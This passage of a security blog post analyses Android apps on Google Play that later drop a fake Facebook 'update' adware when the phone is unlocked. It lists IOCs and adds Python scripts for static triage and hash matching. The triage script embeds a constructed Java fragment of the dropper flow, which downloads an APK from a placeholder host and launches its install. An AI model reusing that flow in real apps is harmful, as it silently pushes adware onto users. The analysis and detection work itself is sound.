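What an analyst can check statically for this pattern, as an added example (it is not code from the post nor from the analysed app): given the decoded AndroidManifest.xml and the decompiled source as text (apktool, jadx or similar), flag the combination the post describes, a receiver that fires on USER_PRESENT, network permission, a read of the “unknown sources” setting and an APK install intent. The manifest, the source fragment, the class names and the URL inside the block are constructed placeholders, not the real sample's.

```python
"""Static triage for the wake-up downloader pattern described above.

Added example, not code from the post or the analysed app. It assumes the
APK is already decoded so the manifest and source are available as text.
SAMPLE_MANIFEST and SAMPLE_SOURCE are constructed for the example.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
USER_PRESENT = "android.intent.action.USER_PRESENT"
URL_RE = re.compile(r"""https?://[^\s"']+""")

# Strings a dropper of this kind tends to leave behind in decompiled code.
CODE_INDICATORS = {
    "install_non_market_apps": "reads the 'unknown sources' setting",
    "INSTALL_NON_MARKET_APPS": "reads the 'unknown sources' setting",
    "application/vnd.android.package-archive": "launches an APK install intent",
    ".apk": "references an APK file name or URL",
    "getPackageInfo": "checks whether a package is already installed",
}


def parse_manifest(manifest_xml):
    """Return declared permissions and receivers that fire on USER_PRESENT."""
    root = ET.fromstring(manifest_xml)
    permissions = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    wake_receivers = []
    for receiver in root.iter("receiver"):
        actions = {a.get(ANDROID_NS + "name") for a in receiver.iter("action")}
        if USER_PRESENT in actions:
            wake_receivers.append(receiver.get(ANDROID_NS + "name"))
    return {"permissions": permissions, "wake_receivers": wake_receivers}


def scan_code(source_text):
    """Return a description of each indicator string found in the source."""
    found = []
    for needle, why in CODE_INDICATORS.items():
        if needle in source_text and why not in found:
            found.append(why)
    return found


def hardcoded_urls(source_text):
    """Pull out hard-coded URLs; these become the download-server IOCs."""
    return URL_RE.findall(source_text)


def triage(manifest_xml, source_text):
    """Combine the signals: unlock-triggered receiver + network + APK install."""
    manifest = parse_manifest(manifest_xml)
    indicators = scan_code(source_text)
    dropper = (
        bool(manifest["wake_receivers"])
        and "android.permission.INTERNET" in manifest["permissions"]
        and "launches an APK install intent" in indicators
    )
    return {
        "wake_receivers": manifest["wake_receivers"],
        "code_indicators": indicators,
        "urls": hardcoded_urls(source_text),
        "verdict": "dropper pattern" if dropper else "no dropper pattern",
    }


# Constructed sample manifest (placeholder package and class names).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.voicechanger">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <application android:label="Voice Changer">
        <receiver android:name="com.example.voicechanger.WakeReceiver">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Constructed decompiled-source fragment mirroring the flow in the post.
SAMPLE_SOURCE = """
public void onReceive(Context ctx, Intent intent) {
    ContentResolver cr = ctx.getContentResolver();
    if (Settings.Secure.getInt(cr, "install_non_market_apps", 0) != 1) return;
    try { ctx.getPackageManager().getPackageInfo("com.facebook", 0); return; }
    catch (NameNotFoundException e) { }
    File apk = download("http://example.invalid/dl/a.apk", "xxx.apk");
    Intent i = new Intent(Intent.ACTION_VIEW);
    i.setDataAndType(Uri.fromFile(apk), "application/vnd.android.package-archive");
    ctx.startActivity(i);
}
"""

if __name__ == "__main__":
    print(triage(SAMPLE_MANIFEST, SAMPLE_SOURCE))
```

The verdict is a heuristic: a legitimate app may register USER_PRESENT (lock-screen widgets do) and a legitimate installer may use the package-archive intent, but a voice changer needing both, plus a read of the unknown-sources setting, is the combination worth a manual look.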

Looks like a legitimate Facebook update

It is important to remember that this screen appears when the user unlocks the phone, at the earliest the day after the original app was installed, and only one time out of three until the second app is installed. So it is very unlikely that the user connects the earlier installation of the “voice changer” with this “update”, which looks like a legitimate installation or update of Facebook. The icon is quite similar and the name makes it even more confusing.

Downloader general scheme

The newly downloaded app could be literally anything. In this case it impersonates Facebook, and its icon disappears just a second after installation. If the user has the real Facebook installed, he or she will assume Facebook just updated itself and will probably forget about it. What has actually happened is that the user has installed a very aggressive adware through this “social engineering” trick.

The icon of the fake Facebook will disappear

Conclusions

Attackers are increasingly specialized in getting an app into Google Play and then turning it into adware or malware over the long term. This long-term operation gives them more victims, and we are seeing this pattern more and more in malicious apps. Triggering the download only when the phone is unlocked gives the fake “update” extra credibility in the eyes of the victim.

Using Path5, we have identified the person behind these apps, a Polish programmer, who has been operating since late 2014. Right now about 20 apps like this are still up in Google Play, out of more than 100 from this same developer that have appeared in Google Play recently. The app analyzed here is us.free.voice.changer.funny.voices.lolapps, SHA1 c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61.

The ones that appear to be from the same person, use the same technique and are still online are these (name, package, SHA1):

  • TV remote controller, us.tv.remote.pilot.television.free.tool2, 88287f102bbd9cf3a3e5e7601b5bc8ee760d4525
  • Faster Wifi PRANK, us.phonehelper.wifi.booster.free, 74b2cc8d95c001832a4d4fb11ea3cb9638daf5e8
  • Visión nocturna gratis, us.night.vision.nightvision.free.useit, 1606ce1f616e3ba29ac021e4ce1ac1cb5e84b7a4
  • Funny voice changer, us.free.voice.changer.funny.voices.lolapps, c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61
  • Fake phone call, us.free.fake.call.caller.lolapps, 3b0a2b88effd264235e75984cea3bc77a6304e8b
  • Fake connection, us.fake.call.caller.free.usapps, 2f3c8a8cd1e5ecdad0e348484c72f25aff45d755
  • Faster internet PRANK, us.phonehelper.internet.booster.free, c2b083d0ce9d13e8df2f680f2901cd54778d385e
  • Increase battery life PRANK, us.phonehelper.battery.booster.free, 4890c7437268b65ef376515047c13e0eecffdd9a
  • Funny voice changer, us.free.voice.changer.funny.voices.lolapps, a97c7f6669c41ead0ba54928ebe2cad5ba706bc5
  • Transparent phone HD, us.transparent.screen.diaphanous.phone.lolapps, 64e44c0d234f96eff5f0e44305d25b35242b0e51
  • Flash-Player installation, us.flashapps.free.flashplayer, 9f0c9145f2a265d476b936830fa9dde3d024eab6
  • Diáfano teléfono (gratis), us.transparent.screen.diaphanous.phone.free.smartools, c6c2617f7cf512669f553876939e5ca367c9e746
  • Increase volume sound PRANK, us.phonehelper.sound.booster.free, 3e360ee39146cbd834280c18d656e3e9f6d0df2f
  • Termómetro electrónico gratis, us.digital.electronic.thermometer.free.measure.temperature.temp, 722f7f2c10c4b656ded858cf9f91a8c55ea226b6
  • Ski jumping 2015, us.ski.jumping.free.game.full.sportgames, 638a1c331e76bec73b1a46a451e4d1de6cd20879
  • FlashPlayer, us.flashapps.free.flashplayer2, 9f7aa1bc90770748681b08e3ee63dcb974195f7a
  • Falsa llamada entrante, us.free.fake.call.caller.smartools, fb9c05094eb1fdcfa8aec07eeff1e95ee7814e76
  • Increase network signal PRANK, us.phonehelper.signal.booster.free, 495b151c5e709bfa50c671c8fb93cbeaee29e025
  • Control remoto para la TV, us.tv.remote.pilot.television.free.tool, dbfd108973388d6c1a506ac68b79463df8271f5c
  • Fake phone call, us.free.fake.call.caller.lolapps, e96d2ab7d8d0c7990be07bd42b9e9bc079e70f3a
  • Tonos para Navidad, us.christmas.ringtones.free.carols.mp3.ringtonedownloader, fa57543faf60073f56041caee0f1524cfc9f77dd
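To put the list above to use, here is an added example (not code from the post) that parses the published name/package/SHA1 lines, hashes APK files on disk against them, and also compares the output of `adb shell pm list packages` with the listed package names. The IOC text is the list as published; the file contents, directory path and `pm` output used when exercising it are constructed placeholders.

```python
"""Match local APKs and installed packages against the published IOC list.

Added example, not part of the original post. IOC_TEXT reproduces the list
above; everything fed to the functions at the bottom is constructed.
"""
import hashlib
import os
import re

IOC_TEXT = """
TV remote controller, us.tv.remote.pilot.television.free.tool2, 88287f102bbd9cf3a3e5e7601b5bc8ee760d4525
Faster Wifi PRANK, us.phonehelper.wifi.booster.free, 74b2cc8d95c001832a4d4fb11ea3cb9638daf5e8
Visión nocturna gratis, us.night.vision.nightvision.free.useit, 1606ce1f616e3ba29ac021e4ce1ac1cb5e84b7a4
Funny voice changer, us.free.voice.changer.funny.voices.lolapps,c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61
Fake phone call, us.free.fake.call.caller.lolapps, 3b0a2b88effd264235e75984cea3bc77a6304e8b
Fake connection, us.fake.call.caller.free.usapps, 2f3c8a8cd1e5ecdad0e348484c72f25aff45d755
Faster internet PRANK, us.phonehelper.internet.booster.free, c2b083d0ce9d13e8df2f680f2901cd54778d385e
Increase battery life PRANK, us.phonehelper.battery.booster.free, 4890c7437268b65ef376515047c13e0eecffdd9a
Funny voice changer, us.free.voice.changer.funny.voices.lolapps, a97c7f6669c41ead0ba54928ebe2cad5ba706bc5
Transparent phone HD, us.transparent.screen.diaphanous.phone.lolapps, 64e44c0d234f96eff5f0e44305d25b35242b0e51
Flash-Player installation, us.flashapps.free.flashplayer, 9f0c9145f2a265d476b936830fa9dde3d024eab6
Diáfano teléfono (gratis),us.transparent.screen.diaphanous.phone.free.smartools,c6c2617f7cf512669f553876939e5ca367c9e746
Increase volume sound PRANK, us.phonehelper.sound.booster.free, 3e360ee39146cbd834280c18d656e3e9f6d0df2f
Termómetro electrónico gratis, us.digital.electronic.thermometer.free.measure.temperature.temp, 722f7f2c10c4b656ded858cf9f91a8c55ea226b6
Ski jumping 2015, us.ski.jumping.free.game.full.sportgames, 638a1c331e76bec73b1a46a451e4d1de6cd20879
FlashPlayer, us.flashapps.free.flashplayer2, 9f7aa1bc90770748681b08e3ee63dcb974195f7a
Falsa llamada entrante, us.free.fake.call.caller.smartools, fb9c05094eb1fdcfa8aec07eeff1e95ee7814e76
Increase network signal PRANK,us.phonehelper.signal.booster.free,495b151c5e709bfa50c671c8fb93cbeaee29e025
Control remoto para la TV, us.tv.remote.pilot.television.free.tool, dbfd108973388d6c1a506ac68b79463df8271f5c
Fake phone call, us.free.fake.call.caller.lolapps, e96d2ab7d8d0c7990be07bd42b9e9bc079e70f3a
Tonos para Navidad, us.christmas.ringtones.free.carols.mp3.ringtonedownloader, fa57543faf60073f56041caee0f1524cfc9f77dd
"""

# "name, package, sha1" with inconsistent spacing around the commas.
LINE_RE = re.compile(r"^\s*(.+?)\s*,\s*([\w.]+)\s*,\s*([0-9a-fA-F]{40})\s*$")


def parse_ioc_list(text):
    """Map lowercase SHA1 -> (display name, package); first entry wins on duplicates."""
    iocs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            name, package, sha1 = m.groups()
            iocs.setdefault(sha1.lower(), (name, package))
    return iocs


def sha1_hex(data):
    """Hex SHA1 of a byte string, the form used in the list."""
    return hashlib.sha1(data).hexdigest()


def match_files(files, iocs):
    """files: mapping path -> bytes. Return (path, name, package) for each hit."""
    hits = []
    for path, data in files.items():
        entry = iocs.get(sha1_hex(data))
        if entry:
            hits.append((path, entry[0], entry[1]))
    return hits


def scan_directory(directory, iocs):
    """Hash every *.apk below directory and match it against the list."""
    files = {}
    for dirpath, _, names in os.walk(directory):
        for n in names:
            if n.lower().endswith(".apk"):
                p = os.path.join(dirpath, n)
                with open(p, "rb") as fh:
                    files[p] = fh.read()
    return match_files(files, iocs)


def installed_matches(pm_output, iocs):
    """Compare `adb shell pm list packages` output with the listed package names."""
    listed = {pkg for _, pkg in iocs.values()}
    found = []
    for line in pm_output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            pkg = line[len("package:"):]
            if pkg in listed and pkg not in found:
                found.append(pkg)
    return found


if __name__ == "__main__":
    iocs = parse_ioc_list(IOC_TEXT)
    print(len(iocs), "hashes loaded")
    print(scan_directory(".", iocs))          # current directory, placeholder
```

A hash match identifies the exact samples listed; the package-name match is the weaker but more practical check on a device, since a later version of the same app will carry a different SHA1 but the same package name.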


Sergio de los Santos
Juan Manuel Tirado